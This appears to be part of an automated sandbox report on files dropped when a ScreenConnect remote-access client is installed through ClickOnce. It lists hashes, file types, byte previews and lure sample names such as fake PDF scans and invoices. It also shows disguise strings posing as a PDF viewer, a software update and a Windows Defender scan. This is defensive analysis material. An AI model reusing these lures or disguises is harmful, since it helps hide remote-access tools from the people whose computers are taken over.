                                                                                                                                                                                                                Preview:PcmH.........[..P.-g$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om..c.............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):242016
                                                                                                                                                                                                                Entropy (8bit):5.858471214140723
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
                                                                                                                                                                                                                MD5:D8259314C0A0D0B11E4979470E4B973A
                                                                                                                                                                                                                SHA1:552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
                                                                                                                                                                                                                SHA-256:B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
                                                                                                                                                                                                                SHA-512:47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4428
                                                                                                                                                                                                                Entropy (8bit):4.076363247876233
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:/vXAvvvvv1eV+Ww8U45ucOEgyKHcThakoNOrf:HwvvvvvKJjucMMPoq
                                                                                                                                                                                                                MD5:7C2074843766C366136BE3FF950BFBD7
                                                                                                                                                                                                                SHA1:F2FEEBE73637D3DA7AA67AC62E1C117CC5201D42
                                                                                                                                                                                                                SHA-256:E0CC8DB642751A95DBCAB334F3E84FE23289FB838B8F69E9B1D392CF600DF5EF
                                                                                                                                                                                                                SHA-512:A1FD2E0C66695FEF788D7F0C0678AAA7B0143E77D3520C3E7CC4BB38909A61744E922333153EFDDFD28F99C107664B0A22FE71ABDC8832E2322F9DC947222A3A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PcmH..............gd,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                • Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: VD01NDHM8u.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: vovE92JSzK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: s9POKY8U8k.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: xkIXA8M8sC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                • Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: VD01NDHM8u.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: vovE92JSzK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: s9POKY8U8k.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: xkIXA8M8sC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):464
                                                                                                                                                                                                                Entropy (8bit):4.856168973028116
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:rHy2DLI4MWozmO5OItfU49cA8RMZRCl13dMHcJRx74:zHE4uM2xbZRpkRxE
                                                                                                                                                                                                                MD5:0DCE7F0E2345982EE860DB000753DC67
                                                                                                                                                                                                                SHA1:18E27EF165824C1B852CDFD5B3A8687BEEA132F4
                                                                                                                                                                                                                SHA-256:351BF775962568F859E12870D992A899A09C3B5A780C7DDDAA49190D8001049E
                                                                                                                                                                                                                SHA-512:B37CA7117105A48D7A476513AE207EFE8BB0717FD95A0AAB8D6AE16F76D57F392FA68BA0F0C3170E30EBEABBE1D145E4A641904676D2A0FAF27A66DCF516666E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_Q2T}Z...5.......c...0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.L.....PDF Viewer.>Software is updating... Please do not turn off your computer!...Microsoft Windows Defender Scan
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):93109
                                                                                                                                                                                                                Entropy (8bit):7.9618781891916806
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:PuVZ7zoDDZuVZ7zoDDx7zoDDx7zoDDx7zoDDx7zoDDX:PGZ3CtGZ3Cl3Cl3Cl3Cl3C7
                                                                                                                                                                                                                MD5:764E92734733E81FA036A56EA784112F
